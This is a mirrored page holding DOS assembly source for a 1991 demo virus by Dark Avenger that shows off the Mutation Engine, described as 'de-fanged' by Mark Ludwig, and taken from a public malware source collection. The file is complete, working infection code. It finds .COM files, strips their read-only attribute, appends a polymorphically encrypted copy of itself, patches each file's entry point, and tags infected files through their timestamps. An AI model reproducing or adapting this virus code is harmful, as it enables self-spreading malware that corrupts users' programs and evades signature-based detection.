mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
214 lines
5.8 KiB
NASM
214 lines
5.8 KiB
NASM
|
|
|||
|
; This is a demo virus to demonstrate
|
|||
|
; the Mutation Engine <tm> usage
|
|||
|
|
|||
|
; Version 1.01 (26-10-91)
|
|||
|
; (C) 1991 Dark Avenger.
|
|||
|
|
|||
|
; De-Fanged for experimentation by Mark Ludwig 3/24/93
|
|||
|
|
|||
|
.model tiny
|
|||
|
.radix 16
|
|||
|
.code
|
|||
|
|
|||
|
extrn mut_engine: near, rnd_get: near, rnd_init: near
|
|||
|
extrn rnd_buf: word, data_top: near
|
|||
|
|
|||
|
org 100
|
|||
|
|
|||
|
start:
|
|||
|
call locadr
|
|||
|
locadr:
|
|||
|
pop dx
|
|||
|
mov cl,4
|
|||
|
shr dx,cl
|
|||
|
sub dx,10
|
|||
|
mov cx,ds
|
|||
|
add cx,dx ;Calculate new CS
|
|||
|
mov dx,offset begin
|
|||
|
push cx dx
|
|||
|
retf
|
|||
|
begin:
|
|||
|
cld
|
|||
|
mov di,offset start
|
|||
|
push es di
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push ax
|
|||
|
mov dx,offset dta_buf ;Set DTA
|
|||
|
mov ah,1a
|
|||
|
int 21
|
|||
|
xor ax,ax ;Initialize random seed
|
|||
|
mov [rnd_buf],ax
|
|||
|
call rnd_init
|
|||
|
mov dx,offset srchnam
|
|||
|
mov cl,3
|
|||
|
mov ah,4e
|
|||
|
find_lup:
|
|||
|
int 21 ;Find the next COM file
|
|||
|
jc infect_done
|
|||
|
call isinf ;see if infected
|
|||
|
jnz infect ;If not infected, infect it now
|
|||
|
find_nxt:
|
|||
|
mov dx,offset dta_buf
|
|||
|
mov ah,4f
|
|||
|
jmp find_lup
|
|||
|
infect_done:
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
push ss
|
|||
|
pop es
|
|||
|
mov di,offset start
|
|||
|
mov si,offset oold_cod
|
|||
|
movsw ;Restore first 12 bytes
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
push ss
|
|||
|
pop ds
|
|||
|
mov dx,80 ;Restore DTA
|
|||
|
mov ah,1a
|
|||
|
int 21
|
|||
|
pop ax
|
|||
|
retf
|
|||
|
|
|||
|
infect:
|
|||
|
xor cx,cx ;Reset read-only attribute
|
|||
|
mov dx,offset dta_buf+1e
|
|||
|
mov ax,4301
|
|||
|
int 21
|
|||
|
jc infect_done
|
|||
|
mov ax,3d02 ;Open the file
|
|||
|
int 21
|
|||
|
jc infect_done
|
|||
|
xchg ax,bx
|
|||
|
mov ax,WORD PTR [old_cod]
|
|||
|
mov WORD PTR [oold_cod],ax
|
|||
|
mov ax,WORD PTR [old_cod+2]
|
|||
|
mov WORD PTR [oold_cod+2],ax
|
|||
|
mov ax,WORD PTR [old_cod+4]
|
|||
|
mov WORD PTR [oold_cod+4],ax
|
|||
|
mov ax,WORD PTR [old_cod+6]
|
|||
|
mov WORD PTR [oold_cod+6],ax
|
|||
|
mov ax,WORD PTR [old_cod+8]
|
|||
|
mov WORD PTR [oold_cod+8],ax
|
|||
|
mov ax,WORD PTR [old_cod+0A]
|
|||
|
mov WORD PTR [oold_cod+0A],ax
|
|||
|
mov dx,offset old_cod ;Read first 12 bytes
|
|||
|
mov cx,0C
|
|||
|
mov ah,3f
|
|||
|
int 21
|
|||
|
jc read_done
|
|||
|
xor cx,cx ;Seek at EOF
|
|||
|
xor dx,dx
|
|||
|
mov ax,4202
|
|||
|
int 21
|
|||
|
test dx,dx ;Make sure the file is not too big
|
|||
|
jnz read_done
|
|||
|
cmp ax,-2000
|
|||
|
jnc read_done
|
|||
|
mov bp,ax
|
|||
|
sub ax,7
|
|||
|
mov word ptr [new_cod+5],ax
|
|||
|
mov ax,cs
|
|||
|
add ax,1000H
|
|||
|
mov es,ax
|
|||
|
mov dx,offset start
|
|||
|
mov cx,offset _DATA
|
|||
|
push bp bx
|
|||
|
add bp,dx
|
|||
|
xor si,si
|
|||
|
xor di,di
|
|||
|
mov bl,0f
|
|||
|
mov ax,101
|
|||
|
call mut_engine
|
|||
|
mov di,dx
|
|||
|
pop bx ax
|
|||
|
add ax,cx ;Make sure file length mod 256 = 0
|
|||
|
neg ax
|
|||
|
xor ah,ah
|
|||
|
add cx,ax
|
|||
|
mov ah,40 ;Put the virus into the file
|
|||
|
int 21
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
jc write_done
|
|||
|
sub cx,ax
|
|||
|
jnz write_done
|
|||
|
xor dx,dx ;Put the JMP instruction
|
|||
|
mov ax,4200
|
|||
|
int 21
|
|||
|
mov dx,offset new_cod
|
|||
|
mov cx,0C
|
|||
|
mov ah,40
|
|||
|
int 21
|
|||
|
jmp write_done
|
|||
|
read_done:
|
|||
|
mov ah,3e ;close the file
|
|||
|
int 21
|
|||
|
jmp infect_done
|
|||
|
write_done:
|
|||
|
mov ax,5700H ;get date & time on file
|
|||
|
int 21H
|
|||
|
push dx
|
|||
|
mov ax,cx ;fix it
|
|||
|
xor ax,dx
|
|||
|
mov cx,0A
|
|||
|
xor dx,dx
|
|||
|
div cx
|
|||
|
mul cx
|
|||
|
add ax,3
|
|||
|
pop dx
|
|||
|
xor ax,dx
|
|||
|
mov cx,ax
|
|||
|
mov ax,5701H ;and save it
|
|||
|
int 21H
|
|||
|
jmp read_done
|
|||
|
|
|||
|
;determine if file is infected
|
|||
|
isinf:
|
|||
|
mov dx,offset dta_buf+1e
|
|||
|
mov ax,3d02 ;Open the file
|
|||
|
int 21
|
|||
|
mov bx,ax
|
|||
|
mov ax,5700H ;get file attribute
|
|||
|
int 21H
|
|||
|
mov ax,cx
|
|||
|
xor ax,dx ;date xor time mod 10 = 3 for infected file
|
|||
|
xor dx,dx
|
|||
|
mov cx,0A
|
|||
|
div cx
|
|||
|
cmp dx,3
|
|||
|
pushf
|
|||
|
mov ah,3e ;Close the file
|
|||
|
int 21
|
|||
|
popf
|
|||
|
ret
|
|||
|
|
|||
|
srchnam db '*.COM',0
|
|||
|
|
|||
|
old_cod: ;Buffer to read first 11 bytes
|
|||
|
ret
|
|||
|
db 0
|
|||
|
dw 0,0,0,0,0
|
|||
|
|
|||
|
|
|||
|
oold_cod: ;old old code
|
|||
|
db 0,0,0,0,0,0,0,0,0,0,0,0
|
|||
|
|
|||
|
new_cod: ;Buffer to write first 11 bytes
|
|||
|
call nc2
|
|||
|
nc1: pop ax
|
|||
|
jmp $+200
|
|||
|
nc2: pop ax
|
|||
|
call nc1
|
|||
|
nop
|
|||
|
|
|||
|
.data
|
|||
|
|
|||
|
dta_buf db 2bh dup(?) ;Buffer for DTA
|
|||
|
|
|||
|
end start
|
|||
|
|